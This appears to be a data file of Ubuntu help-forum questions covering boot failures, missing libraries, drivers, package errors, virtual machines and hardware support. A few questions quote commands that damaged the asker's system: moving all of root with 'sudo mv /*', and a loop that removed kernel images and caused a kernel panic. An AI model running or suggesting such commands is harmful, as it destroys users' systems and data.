504269	how to installed windows 7 after installing.ubuntu doing messed up	after installing ubuntu i tried to install windows 7 from live use and in booting this appeared windows boot manager windows failed to start . a recent hardware or software change might be the case.to fix the problem : if you do not have this disc , contact your administrator or computer manufacture for assistance . file : \boot\bcd status : oxc0000098 info : the windows boot configuration data does not contain a valid os entry . screenshot link imgur.com/ikuiikf how to install windows 7
504271	citrix can not find libxp.so.6	i have recently installed citrix but when running : client_exec= '' /opt/citrix/icaclient/wfcmgr '' ldd $ { client_exec } i get linux-gate.so.1 = > ( 0xf77db000 ) libxm.so.4 = > /usr/lib/i386-linux-gnu/libxm.so.4 ( 0xf7520000 ) libxp.so.6 = > not found libxpm.so.4 = > /usr/lib/i386-linux-gnu/libxpm.so.4 ( 0xf750d000 ) libsm.so.6 = > /usr/lib/i386-linux-gnu/libsm.so.6 ( 0xf7504000 ) libice.so.6 = > /usr/lib/i386-linux-gnu/libice.so.6 ( 0xf74ea000 ) libxmu.so.6 = > /usr/lib/i386-linux-gnu/libxmu.so.6 ( 0xf74d1000 ) libxinerama.so.1 = > /usr/lib/i386-linux-gnu/libxinerama.so.1 ( 0xf74cd000 ) libdl.so.2 = > /lib/i386-linux-gnu/libdl.so.2 ( 0xf74c7000 ) libglib-2.0.so.0 = > /lib/i386-linux-gnu/libglib-2.0.so.0 ( 0xf73bb000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xf739f000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xf71f0000 ) libxt.so.6 = > /usr/lib/i386-linux-gnu/libxt.so.6 ( 0xf7194000 ) libx11.so.6 = > /usr/lib/i386-linux-gnu/libx11.so.6 ( 0xf705f000 ) libxext.so.6 = > /usr/lib/i386-linux-gnu/libxext.so.6 ( 0xf704c000 ) libfontconfig.so.1 = > /usr/lib/i386-linux-gnu/libfontconfig.so.1 ( 0xf7011000 ) libxft.so.2 = > /usr/lib/i386-linux-gnu/libxft.so.2 ( 0xf6ffb000 ) libjpeg.so.8 = > /usr/lib/i386-linux-gnu/libjpeg.so.8 ( 0xf6fa0000 ) libpng12.so.0 = > /lib/i386-linux-gnu/libpng12.so.0 ( 0xf6f77000 ) libuuid.so.1 = > /lib/i386-linux-gnu/libuuid.so.1 ( 0xf6f71000 ) /lib/ld-linux.so.2 ( 0xf77dc000 ) libpcre.so.3 = > /lib/i386-linux-gnu/libpcre.so.3 ( 0xf6f33000 ) libxcb.so.1 = > /usr/lib/i386-linux-gnu/libxcb.so.1 ( 0xf6f11000 ) libfreetype.so.6 = > /usr/lib/i386-linux-gnu/libfreetype.so.6 ( 0xf6e71000 ) libexpat.so.1 = > /lib/i386-linux-gnu/libexpat.so.1 ( 0xf6e47000 ) libxrender.so.1 = > /usr/lib/i386-linux-gnu/libxrender.so.1 ( 0xf6e3c000 ) libz.so.1 = > /lib/i386-linux-gnu/libz.so.1 ( 0xf6e22000 ) libm.so.6 = > /lib/i386-linux-gnu/libm.so.6 ( 0xf6ddc000 ) libxau.so.6 = > /usr/lib/i386-linux-gnu/libxau.so.6 ( 0xf6dd8000 ) libxdmcp.so.6 = > /usr/lib/i386-linux-gnu/libxdmcp.so.6 ( 0xf6dd0000 ) as you can see libxp.so.6 was not found . i figured that this library is located in /usr/lib/x86_64-linux-gnu and all the other libraries are in /usr/lib/i386-linuxpgnu . can i somehow link the libxp.so.6 to the other directory ? the output of find / -name `` *libxp* '' -exec ls -l { } \ ; -print is : -rw-r -- r -- 1 root root 2792 dec 18 2013 /usr/share/man/man3/libxp.3xp.gz /usr/share/man/man3/libxp.3xp.gz lrwxrwxrwx 1 root root 16 may 2 2012 /usr/lib/i386-linux-gnu/libxpm.so.4 - > libxpm.so.4.11.0 /usr/lib/i386-linux-gnu/libxpm.so.4 -rw-r -- r -- 1 root root 67460 may 2 2012 /usr/lib/i386-linux-gnu/libxpm.so.4.11.0 /usr/lib/i386-linux-gnu/libxpm.so.4.11.0 lrwxrwxrwx 1 root root 12 jul 29 20:32 /usr/lib/i386-linux-gnu/libxp.so.6 - > ./libxp.so.6 /usr/lib/i386-linux-gnu/libxp.so.6 -rw-r -- r -- 1 root root 35712 dec 18 2013 /usr/lib/x86_64-linux-gnu/libxp.so.6.2.0 /usr/lib/x86_64-linux-gnu/libxp.so.6.2.0 lrwxrwxrwx 1 root root 14 dec 18 2013 /usr/lib/x86_64-linux-gnu/libxp.so - > libxp.so.6.2.0 /usr/lib/x86_64-linux-gnu/libxp.so lrwxrwxrwx 1 root root 16 may 2 2012 /usr/lib/x86_64-linux-gnu/libxpm.so.4 - > libxpm.so.4.11.0 /usr/lib/x86_64-linux-gnu/libxpm.so.4 lrwxrwxrwx 1 root root 16 may 2 2012 /usr/lib/x86_64-linux-gnu/libxpm.so - > libxpm.so.4.11.0 /usr/lib/x86_64-linux-gnu/libxpm.so -rw-r -- r -- 1 root root 72776 may 2 2012 /usr/lib/x86_64-linux-gnu/libxpm.so.4.11.0 /usr/lib/x86_64-linux-gnu/libxpm.so.4.11.0 lrwxrwxrwx 1 root root 14 dec 18 2013 /usr/lib/x86_64-linux-gnu/libxp.so.6 - > libxp.so.6.2.0 /usr/lib/x86_64-linux-gnu/libxp.so.6 -rw-r -- r -- 1 root root 60508 dec 18 2013 /usr/lib/x86_64-linux-gnu/libxp.a /usr/lib/x86_64-linux-gnu/libxp.a -rw-r -- r -- 1 root root 123452 may 2 2012 /usr/lib/x86_64-linux-gnu/libxpm.a /usr/lib/x86_64-linux-gnu/libxpm.a here the second output : -rw-r -- r -- 1 root root 2792 dec 18 2013 /usr/share/man/man3/libxp.3xp.gz /usr/share/man/man3/libxp.3xp.gz lrwxrwxrwx 1 root root 16 may 2 2012 /usr/lib/i386-linux-gnu/libxpm.so.4 - > libxpm.so.4.11.0 /usr/lib/i386-linux-gnu/libxpm.so.4 -rw-r -- r -- 1 root root 67460 may 2 2012 /usr/lib/i386-linux-gnu/libxpm.so.4.11.0 /usr/lib/i386-linux-gnu/libxpm.so.4.11.0 -rw-r -- r -- 1 root root 35712 dec 18 2013 /usr/lib/x86_64-linux-gnu/libxp.so.6.2.0 /usr/lib/x86_64-linux-gnu/libxp.so.6.2.0 lrwxrwxrwx 1 root root 14 dec 18 2013 /usr/lib/x86_64-linux-gnu/libxp.so - > libxp.so.6.2.0 /usr/lib/x86_64-linux-gnu/libxp.so lrwxrwxrwx 1 root root 16 may 2 2012 /usr/lib/x86_64-linux-gnu/libxpm.so.4 - > libxpm.so.4.11.0 /usr/lib/x86_64-linux-gnu/libxpm.so.4 lrwxrwxrwx 1 root root 16 may 2 2012 /usr/lib/x86_64-linux-gnu/libxpm.so - > libxpm.so.4.11.0 /usr/lib/x86_64-linux-gnu/libxpm.so -rw-r -- r -- 1 root root 72776 may 2 2012 /usr/lib/x86_64-linux-gnu/libxpm.so.4.11.0 /usr/lib/x86_64-linux-gnu/libxpm.so.4.11.0 lrwxrwxrwx 1 root root 14 dec 18 2013 /usr/lib/x86_64-linux-gnu/libxp.so.6 - > libxp.so.6.2.0 /usr/lib/x86_64-linux-gnu/libxp.so.6 -rw-r -- r -- 1 root root 60508 dec 18 2013 /usr/lib/x86_64-linux-gnu/libxp.a /usr/lib/x86_64-linux-gnu/libxp.a -rw-r -- r -- 1 root root 123452 may 2 2012 /usr/lib/x86_64-linux-gnu/libxpm.a /usr/lib/x86_64-linux-gnu/libxpm.a i reinstalled citrix 13.0 and now i receive this error : http : //i.stack.imgur.com/i3o8k.png
504272	how do i check the current frequency of my cpu ?	i 've been trying to find some information on this but seem to only find things similar but not exactly the same . i 'm using xubuntu on my notebook with an core i7 processor which does hyper-threading and turbo-boost . i 've seen that it does hyper-thread in linux , but i have no idea to see what the actual cpu clock is at the moment i wish to check . in windows 8 , the task manager would give statistics on the usage of the cpu , ram and hdd . the cpu would sink all the way down to 1.15ghz when idle and be at 0 or 1 % utilisation . with xubuntu , i 'm not sure how to find that , so could anyone assist me with this ? also , my laptop runs considerably hotter under linux ( generally ) with the fans running faster . i figured it may be my cpu . could it be that or would something else be running constantly , if so , what would it be ? thank you : )
504274	grub rescue / move folder	i made a really silly sudo mv /* /some_folder move command on my remote server vm ubuntu 12.04 that moved my boot folder to /home/ ... /somefolder/boot i can access this folder via a browser terminal that gives me grub rescue . how can i move the entire folder back to root location so to boot normally ? if that is impossible then if i boot from this location , will i be able to traverse to folders higher than the boot folder , as to at least copy my files via ssh ? update i manage to do the following grub rescue > set prefix= ( hd0,1 ) /home/path_to_boot/boot/grub grub rescue > set root= ( hd0,1 ) /home/path_to_boot/ grub rescue > insmod normal grub rescue > normal which launches a menu with options in choosing ubuntu boot . i press c to enter console and get to grub mode to issue linux command . grub > linux /home/path_to_boot/boot/vmlinuz-3.xx.x-67-generic grub > initrd /home/path_to_boot/boot/initrd.img-3.xx.x-67-generic grub > boot after that i get stuck at ( initramfs ) at this point i have no access to /home folder , only to folders inside /home/path_to_boot/boot . any ideas how to proceed ? update 2 i contacted my servers company and got the option to boot via a live cd . with it i did a gksudo nautilus and managed to copy my files . unfortunately though i was n't able to save my system via grub , but so i got the files i needed .
504275	which version of ubuntu is suitable ?	please tell me which version of ubuntu is compatible with my laptop ? my laptop features : processor : intel core to duo cpu t6570 @ 2.10 ghz ram : 3 gb system type : 32bit operating system , x64-based processor thanks in advance
504276	how do i use apt to install 32-bit openjdk-7-jre on azure amd64 ubuntu server 14.04 lts ( trusty ) ?	ubuntu server 14.04 lts for azure does not come with java pre-installed . the server architecture is amd64 . i know that you can not install both the x64 and x86 jres side-by-side , and i only need the x86 version ( application requirements , memory requirements , etc ) . both the x86 and x64 versions of openjdk-7-jre are available directly from ubuntu here : http : //packages.ubuntu.com/trusty/openjdk-7-jre http : //packages.ubuntu.com/trusty/i386/openjdk-7-jre/download however , ubuntu strongly recommends using a package manager ( such as apt ) to install the package , rather than downloading the binaries using a web-browser and manually copying to the destination machine . therefore , i 've been trying to install from the command line , but i 'm running into issues : myadmin @ server01 : ~ $ sudo apt-get install openjdk-7-jre : i386 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package openjdk-7-jre myadmin @ server01 : ~ $ the installation is successful if i omit the i386 , but then i get the 64-bit jre by default - which is not what i need . i 've confirmed that the source is already added in /etc/apt/sources.list deb http : //security.ubuntu.com/ubuntu trusty-security main deb-src http : //security.ubuntu.com/ubuntu trusty-security main deb http : //security.ubuntu.com/ubuntu trusty-security universe deb-src http : //security.ubuntu.com/ubuntu trusty-security universe # deb http : //security.ubuntu.com/ubuntu trusty-security multiverse # deb-src http : //security.ubuntu.com/ubuntu trusty-security multiverse is there another package , library , or repository that i need to install or update , before i can proceed with the apt installation of the openjdk x86 jre ?
504277	xfce - emulate third button in laptop	in kde there is an option where the user can configure the double tap on the touchpad for emulating the third button . then the user can open new tabs in firefox or paste the content selected on the terminal just using a tapping with two fingers . however , i did not find this option in xfce ( xubuntu 14.04 ) . i 've seen the solution suggested for xfce running on ubuntu 12.04 , but it does not work in my case . any suggestion ?
504280	creating custom images for maas install	i am trying to deploy a juju charm which requires an updated 3.11 kernel on ubuntu 12.04 . since kernel update requires a reboot , i 'm thinking of creating a custom image which has the updated kernel . from the maas docs , i am able to see information on importing images but not clear how to create custom images . is there any documentation available for creating custom images ? thank you
504281	help on dualboot ubuntu 14.04 and windows 7 on hp mini 200 ?	i 'm new to these forums so no hate please guys ... all i am trying to do is dualboot the latest ubuntu and windows 7 on my fairly new hp mini 200 . i am using this video : https : //www.youtube.com/watch ? v=xk8x7_tywma for guidance . i have `` partitioned '' ( set aside ) 15gb of space to install ubuntu . here is a link to a photo of the installation process i am currently stuck at . http : //i.stack.imgur.com/dpf0k.jpg i do n't know what to do from here . should i delete /dev/sda4 ( hp tools ) ? ? if so , how ? ? apparently it contains the bios part of the startup menu ... any help will be very appreciated .
504285	install 14.04 tls ubuntu 32 on virtual box	failed to open a session for the virtual machine ubuntu32 . the virtual machine 'ubuntu32 ' has terminated unexpectedly during startup with exit code 1 . result code : e_fail ( 0x80004005 ) component : machine interface : imachine { 480cf695-2d8d-4256-9c7c-cce4184fa048 }
504287	usb 3.0 ports not working after upgrade to 14.04.1	after an upgrade to 14.04.1 from 14.04 , usb 3.0 ports on my laptop no longer detect usb 2.0 memory sticks , keyboards , mice or modems . however usb 3.0 hard drives are detected and mounted successfully by the same ports . the output from dmesg| grep -i usb suggests devices are detected but the address can not be set : [ 2.922176 ] usb 3-1 : new full-speed usb device number 2 using xhci_hcd [ 2.922364 ] usb 3-1 : device not responding to set address . the affected computer has full disk encryption , while another machine i tested on did n't and it seemed ok . i should add the ports and connected devices are correctly listed in powertop and that they are powered , i.e . i can charge a phone via usb 3.0 . would welcome any comments on how to resolve this . searches so far have only revealed similar issues with much older kernels . cheers
504289	ubuntu stuck at black screen with pink diagonal lines after selecting `` try ubuntu . '' ( update - still need help )	i 'm trying to follow the instructions from this site ( http : //www.howtogeek.com/howto/windows-vista/use-ubuntu-live-cd-to-backup-files-from-your-dead-windows-computer/ ) , but after selecting `` try ubuntu '' , i 'm stalled at a black screen with pink diagonal lines and it 's been this way for almost a half-hour now . the cd stopped moving pretty early on too . my mother 's windows vista is dead and we 're trying to recover all of her work related files off it . does anyone have any solutions ? her office it says that the more you boot up a computer with a damaged hard drive , the more files you lose and she 's already booted it up four times now ( not including this time ) . if anyone can help out , i 'd really appreciate it , thank you . update : ubuntu would n't work on her computer ( i 'm thinking graphics card issues ) so i installed lubuntu instead . i got lubuntu to work on her computer , and it even let me mount and access the hard drive , however , when i click a folder , it tells me something like `` corrupt '' and i selected the file manager to open it , but now it 's saying `` input/output error '' when i try to access the users folder . any idea why it 's doing this ? another update : i made the mistake of giving in to my mother `` looking at it '' and she ejected the hard drive because she thought it was a `` down arrow '' . i restarted and now it 's not even recognizing it . i 'm gon na guess that 's probably not a good thing , and i 'm really upset and frustrated at this point .
504291	how to create your own domain name from your ip and map/sync that with dns server ?	is there any way to create your own domain name instead of purchasing ? ? ?
504296	qt- > how to set alt key active	can someone please explain how to set the alt key as active permanently ? i 'm trying to make an application for ubuntu and i need to make it active . i want to add it to the code below in the if statement : void mainwindow : :on_checkboxtitlebar_toggled ( bool checked ) { settings- > setvalue ( `` systemtitle '' , checked ) ; ui- > buttonminimize- > setvisible ( ! checked ) ; ui- > buttonclose- > setvisible ( ! checked ) ; if ( ! checked ) { this- > setwindowflags ( qt : :framelesswindowhint | qt : :windowminimizebuttonhint ) ; //here i whant the new code line for the alt key } else { this- > setwindowflags ( qt : :window | qt : :windowclosebuttonhint | qt : :windowminimizebuttonhint ) ; } i 'm new to c++ , just do n't really understand how c++ works , but i 'm trying .
504297	installing teamspeak	i want to install teamspeak and found this tutorial . when i go to the official teamspeak download site here i have several options to download for linux . i downloaded the amd64 client package ( using fully updated 64bit ubuntu ) . i went and checked the `` start as program '' checkbox in the properties of the .run file . sadly when i started it with a doubleclick gedit opened it ( and crashed after a while ) . so i navigated to the folder and did : ./teamspeak3-client-linux_amd64-3.0.15.1.run it worked and i had a folder with teamspeak in my downloads folder . but although i checked the `` start as program '' checkbox for the ts3client_linux_amd64 it does nothing.. if i rightclick and choose `` run as application '' nothing happens ( at least i see nothing ) . the ts3client_runscript.sh opens in gedit beneath enabling the said checkbox . any way to get it working ? do n't know how to run these over terminal ( pretty new user ) . mind that the checkbox titles etc . are freely translated from german to english . thank you for your time !
504300	how to file a bug on ubuntu gnome ?	there is a cups problem and i do n't know how or where i could submit a bug report .
504301	input methods missing in gnome-terminal context menu	on ubuntu 14.04 . for gnome-terminal , i right click in the terminal window i get the context men but without input methods . what should i do to have it there ?
504303	intel wireless-n 7260 dropping connection	i have a lenovo yoga 2 pro running 14.04 which according to dmesg has a intel wireless-n 7260 . the wifi is not working correctly . every 15 minutes or so it will ether get really slow or drop connection altogether . i have found many other questions about this same issue but the solution has always been to upgrade the firmware and i have the latest . > dmesg|grep wifi [ 2.069093 ] iwlwifi 0000:01:00.0 : irq 60 for msi/msi-x [ 2.075970 ] iwlwifi 0000:01:00.0 : loaded firmware version 22.24.8.0 op_mode iwlmvm [ 2.104994 ] iwlwifi 0000:01:00.0 : detected intel ( r ) wireless n 7260 , rev=0x144 [ 2.105153 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s
504306	upgrade dedicated vps 12.10 quantal instance from terminal	i 'm having a tough time upgrading my dedicated vps 12.10 instance to the newest version 14.04 . what i 've done : lsb_release -a which verifies i 'm on 12.10 quantal . i then tried do-release-upgrade -d but i get do-release-upgrade : command not found . i 've also tried apt-get install update-manager-core but i get : e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? which i guess makes sense because 12.10 repositories no longer exist because it 's not supported anymore . can anyone lend a hand as to how to upgrade ?
504307	ubuntu 14.04 - changing intel graphics driver configurations ?	i am running a graphics toolbox using matlab called psychophysics . i am this close to getting everything working , but i 'm having drama with synchronization errors which has to do with my driver settings . check this post out : he says the error below is most likely due to a few options needed to be reset , most notably option `` triplebuffer '' `` off '' option `` swapbufferswait '' `` on '' my question is how do i even reset these values ? he mentioned the xorg.conf file , but i 've read in many different places that this file is n't used anymore . i ca n't find it using the 'find /usr -name xorg.conf ' unix command on my system either ( and that would take forever ) . i 'm also afraid i will ruin my graphics card if i do n't talk to someone who knows their stuff . here is my error message : ptb-info : no low-level controllable gpu on screenid 0 . beamposition timestamping and other special functions disabled . ptb-debug : psychosgetswapcompletiontimestamp : this likely means a driver bug or malfunction , or that timestamping support has been disabled by the user in the driver ! ptb-info : opengl-renderer is intel open source technology center : : mesa dri intel ( r ) sandybridge mobile : : 3.0 mesa 10.1.3 ptb-info : vbl startline = 768 , vbl endline = -1 ptb-info : will try to use os-builtin openml sync control support for accurate flip timestamping . ptb-info : measured monitor refresh interval from vblsync = 16.682734 ms [ 59.942213 hz ] . ( 297 valid samples taken , stddev=0.322476 ms. ) ptb-info : reported monitor refresh interval from operating system = 16.646968 ms [ 60.070999 hz ] . ptb-info : small deviations between reported values are normal and no reason to worry . warning : could n't compute a reliable estimate of monitor refresh interval ! trouble with vbl syncing ? ! ? -- -- - ! ptb - error : synchronization failure ! -- -- one or more internal checks ( see warnings above ) indicate that synchronization of psychtoolbox to the vertical retrace ( vbl ) is not working on your setup .
504308	dll problem while running a program in wine	i have a 64 bit host system and installed wine using sudo apt-get install wine1.6 . i created a new 32 bit prefix like so : winearch=win32 wineprefix=~/.wine winecfg . then i ran the installer of the software i wanted to install . it exited without any errors . i ran wineboot to 'reboot ' wine and then launched the installed program . nothing showed up so i tried running wine toris32.exe manually in the installation path and got the following error : paste . it seems like the path variable to system32 is n't set up properly . what can i do to fix this problem ?
504309	how to copy the contents of hard drive to a external media using live cd	i am currently on a live cd and i want to copy down all the data present in my hard disk now so in short how to do it . i am in trouble . i want to recover all the files that were saved in my hard disk partition sda6 ubuntu has crashed and thats the reason i want to do so i can not login into ubuntu what i have last just before is i installed yed graph editro through these commands wget http : //www.yworks.com/products/yed/demo/yed-3.12.2_64-bit_setup.sh chmod +x yed-3.12.2_*-bit_setup.sh ./yed-3.12.2_*-bit_setup.sh has that command made my files unexecutable
504311	apache2 updated , but not installed	i started ubuntu , and it did it 's normal update . three out of the four packages were for apache2 , which i 've always been told not to run outside a vm because it can be dangerous . i was surprised because i did not install it on my main machine , but i do have it running on a virtual machine . i went to uninstall it , and did sudo apt-get purge mysql-server apache2 php5 but it says that none of those packages exist . i then went to localhost in my browser , and am getting the default `` it works ! '' apache page , and not the ubuntu one . i searched my history , and never installed apache2 or lamp . any idea what 's going on ?
504313	apt-get wo n't install dependency	file a , version 12 , has a dependency on file b , version 12 . however , in the repo , there exists a b_12_all.deb and b_13_all.deb . the dependency in a_12_all.deb 's control file is the following : package : a version : 12 architecture : all depends : b ( = 12 ) , dpkg when i do an apt-get on a=12 , i get the following : # apt-get install a=12 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : a : depends : b ( = 12 ) but 13 is to be installed e : unable to correct problems , you have held broken packages . `` apt-get -f install a=12 '' fails too . however , `` apt-get install a=12 b=12 '' succeeds . what am i doing wrong ? should n't apt-get automatically pull in the dependency , especially when apt-get can find the dependency ? the repo is generated using the following commands : # apt-ftparchive generate apt-ftparchive.conf # apt-ftparchive -c apt-binary-release.conf release dists/binary > dists/release
504314	grub2 menu black screen error	im very new to ubuntu never heard of it until three months ago when my computer crashed ( i was running on a windows 8.1 then ) and my friend helped me install ubuntu linux 14.1 from a bootable cd . recently i have run into a issue i restarted my computer because a application froze and when it restarted i was looking at this grub2 menu giving me 4 options to run 1. ubuntu 2.advanced ubuntu options and two memory test options . i tried clicking the ubuntu and after that im brought to a black screen with a cursor flashing in the top left corner and it doesnt go any further from there . i apologies in advance if i misspelled anything and that i can not take a screen shot or anything , i am currently on a public library computer typing this for help as my computer is not working at the current time . i can really use all the help i can get thanks !
504315	kubuntu freezes at splash screen	a recent update of kubuntu 14.04 prevents the login process to go beyond the splash screen . the computer is a kubuntu 64-bits 14.04 desktop with a geforce gtx 580 . i have been running the 14.04 for a couple of months now without any issue . so far , i have tried : renaming the .kde folder downgrading the nvidia driver from 331 to 304 . the .xsession-errors displays a crypitc : we failed , but the fail whale is dead . sorry and a couple of other attempts i can not recall . anyone can help with more directed attempts ? thanks
504316	error when installing clipgrab on trusty	i wanted to install clipgrab on trusty , but get the following error when running sudo apt-get install clipgrab ( i added the ppa and ran apt-get update ) : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : clipgrab 0 upgraded , 1 newly installed , 0 to remove and 351 not upgraded . need to get 0 b/203 kb of archives . after this operation , 713 kb of additional disk space will be used . ( reading database ... 247242 files and directories currently installed . ) preparing to unpack ... /clipgrab_3.4.2~trusty3_amd64.deb ... unpacking clipgrab ( 3.4.2~trusty3 ) ... dpkg : error processing archive /var/cache/apt/archives/clipgrab_3.4.2~trusty3_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/ffmpeg ' , which is also in package ffmpeg 7:2.3-1~trusty processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... errors were encountered while processing : /var/cache/apt/archives/clipgrab_3.4.2~trusty3_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) as far as i can understand , the installation process has a problem with ffmpeg already existing . how can i fix this ?
504318	`` unexitable '' gui program	is it possible to create a gui application , where user can interact with it , but can not switch to any other program ( terminal , desktop , etc ) . example of such applications would be something running on a public kiosk , where you will like the user to be able to use your application , but not mess around with the computer in any other way . if this is not entirely possible , how much `` harder '' it can be made for the user to switch the application , and cause any potential damage to the system ? ps : i am ok with running the program under a separate user account , chroot , etc if need be .
504320	numix gtk theme removes the `` unity boxes ''	firstly , yes , i am aware this is a feature of the theme however i personally find it , well , ugly . my question is basically if there is anyway to reverse this and keep the boxes while still using the theme . i know i 'd need to remove .svg files from the theme in my files , but im unsure which ones need to be removed . any help would be great : )
504323	google chrome 36 and java 7 update 65 not working	i believe this question has been asked before , but the `` solution '' given is a workaround that i think is just not what i 'm looking for . apparently google chrome 36 does n't support npapi plugins anymore so icedtea-7-plugin wo n't work anymore with google chrome . the proposed solution somewhere else is to downgrade from version 35 to 34 and wait until this gets fixed in the next patch . unfortunately we are on version 36 and still the issue is not resolved . so my question is : has anyone found a permanent solution that does n't imply having to downgrade the browser for who knows how long ? the error message is : this plug-in is not supported . thanks !
504326	printf , redirection , crontab	i 'm having trouble redirecting c printf statements to a file with a program running as root . i have a program with several informational printf statements and other libraries which print errors via stderr . i 'd like to log these to a file . if i start the program from the command line , i can see stderr and stdout messages . sudo ./myprogram if i try to redirect like so , sudo ./myprogram > > log_file 2 > & 1 the log_file only contains stderr , and stdout disappears . i suspect the issue is related to the root user not being connected to stdout , but i have n't found a solution . my ultimate goal is to run this program at system start as root , while logging stderr and stdout to a log_file . i 've been trying this using crontab , sudo crontab -e and adding the line , @ reboot bin/myprogram > > log_file 2 > & 1 this generates stderr messages but stdout disappears , same as command line . any help is appreciated , thanks ! edits & updates : testing this morning , the redirection behaves the same without sudo . a typical printf statement looks like : printf ( `` info : passed safety check\n '' ) ; i 'm using a default set up for ubuntu 14.04 on an arm processor , so i believe i 'm using bash . i confirmed with , echo $ shell produces /bin/bash
504329	ubuntu apps developer team	i 'm writing on behalf of getting answers for a few questions . i have a team and we have to develop apps for ubuntu software centre . i am the team leader and i have two members and we are growing fast , but for doing this as a team i need some guidance for getting for real involved in developing apps for ubuntu ! how can we register as a team ( not as a person ) so we can get recognized ? do we get any special tutorials for developing or i can get access to buy a book or send as one ? do we need to register as a `` business '' to our local townhall even if we want some of apps to be paid ? despite we are three in total i have access to an university so we are eligible for practice for students in two different cities , so we are , in fact a growing ubuntu community , and may be some important point in making relationships and partnership with those universities . is there any policy in making partnership with university through us ?
504334	how to show slide console on laptop and slide-show in the projector using libreoffice 4.2 on lubuntu 14.04 ?	i 'm trying to setup my laptop ( dell d420 ) with lubuntu 14.04 and libreoffice 4.2 to show a slide presentation to a vga projector . i used arandr to make a screen layout where the laptop screen ( resolution 1280x800 ) shows the left side of the desktop and the vga projector ( 1024x768 ) the right side . i tried a number of configurations and settings to no success except one that work partially : going to slide show menu and slide show settings i set multiple displays to all displays . in doing so i see the slide show on the projector but only the edition mode in the laptop screen . trying the other settings for multiple displays will give : display 1 : console shows on the laptop screen but the slide show does n't appear in the projector screen ( instead it appears in the background of the laptop screen ) display 2 ( external display ) : shows the console fully on the laptop screen but does n't show the slide show in the projector . auto external ( display 2 ) : same as display 2 . if i set arandr to mirror the display only the console will be mirrored and not the slide show . somebody could tell me a solution ?
504340	how to install league of legends ?	i 've been trying to install the league of legends few days ago and the results have not been good . i installed the game properly and everything but when i start the game the screen goes black , only the names of champions and menus appear in red . will my video card work , or just can not play it in ubuntu ?
504343	how do i enable right click on a lenovo z580 ?	right click does n't work with ubuntu 12.04 on a lenovo z580 . one can work around this using a two-finger click , but its pretty annoying .
504345	screen dims when looking at dark screens	i am using ubuntu 14.04 on a dell inspiron 11 . it uses intel 's integrated graphics cards . the problem i 'm having is when ever i bring something up on the screen that is dark ( such as a terminal screen ) my computer dims , and its a real pain as it makes it hard to view some items . from what i 've found it appears to be related to some type of dynamic contrast , but for the life of me , i ca n't figure out how to turn it off .
504347	need to use my 4g , wirth my virgin mobile usb , only uses 3g , but i want to use my 4g , how do i do it ?	i want to use my 4g on my virgin mobile usb , but i do n't know how to with ubuntu . i put it in and it just starts working . well sort of i have to click on it to connect , but it is only using the 3g part of the stick , i have tried to find it in the os but , i ca n't find it , because it is running straight from the stick . in win7 it installed the software on the computer . ubuntu runs it from the stick , with no option to use the 4g . please help .
504349	ubuntu kernel panic	ubuntu ask me to upgrade my ubuntu version from 13.10 , to 14.04 , so i said yes and i could not upgrade it because i did n't have enough space in /boot . i did my research in google , and i found this page , to resume i did what they say to do , only these three commands to put in the terminal ( shell ) : sudo su dpkg -- get-selections|grep 'linux-image*'|awk ' { print $ 1 } '|egrep -v `` linux-image- $ ( uname -r ) |linux-image-generic '' |while read n ; do apt-get -y remove $ n ; done apt-get autoclean total disaster - it shows this kernel panic-not syncing : vfs : unable to mount root fs on unknown block ( 0,0 ) , and now i do n't know what to do , please help .
504350	unable to connect to internet with virtualbox using bridged adapter ?	earlier , i was using multiple instances of virtual machines running linux ubuntu 14.04 on virtualbox . they were working fine , with internet connectivity , etc . however , i then created a new virtual machine with the same settings , and now all of a sudden , all three of my virtual machines can not connect to the internet . currently , the network settings are at bridged adapter . the internet does work when i use nat , but i need to use the bridged adapter setting for the project i am working on . i have tried uninstalling and reinstalling virtualbox , as well as uninstalling and reinstalling the virtualbox bridged networking driver , as well as turning off and turning on my host computer . now i am completely out of ideas and it has been putting my work to a standstill . if you have any ideas on how to fix this problem , it would be appreciated . thanks !
504351	the program 'iptables ' is currently not installed	i am a newbie , so my apologies up front . i am trying to get dansguardian installed ( which i believe i have ) and working . to get it working i need to filter ip traffic through the app via iptables . there are appropriate commands in the 'getting dansguardian working on ubuntu ' page . my issue is that the system is telling me that iptables is not currently installed - which is wrong . i understand that it is the primary firewall service for ubuntu . i have tried : xyzzy @ ubuntu : /usr/sbin $ iptables the program 'iptables ' is currently not installed . you can install it by typing : sudo apt-get install iptables so : sudo apt-get install iptables reading package lists ... done building dependency tree reading state information ... done iptables is already the newest version . the following package was automatically installed and is no longer required : thunderbird-globalmenu use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 342 not upgraded . only to be told that the version i am running is the latest . ufw is running .
504352	usb usr phone compatibility	is the us robotics usr019601a usb phone supported in current ubuntu ? it worked under skype .
504355	what & which android phones are fastest and compatible with ubuntu touch/	i 've been looking at getting an android for ubuntu and i want to know which phones are compatible if some one could point me to a list of compatible phones i would be happy.i have n't been able to find a phone list anywhere that can give me a list of phones that fully work with ubuntu touch/phone . all i need is the list but if some one also knows which phone is fastest with it ( i 'm looking at cpu speed ) id be happy to . so far the ones i have been able to confirm that work are all 1.7ghz and below but i know there are ones with 2.7 and i want to know if they work , i would assume not since they are all really new and have n't had drivers developed for them . thanks in advanced for any replies .
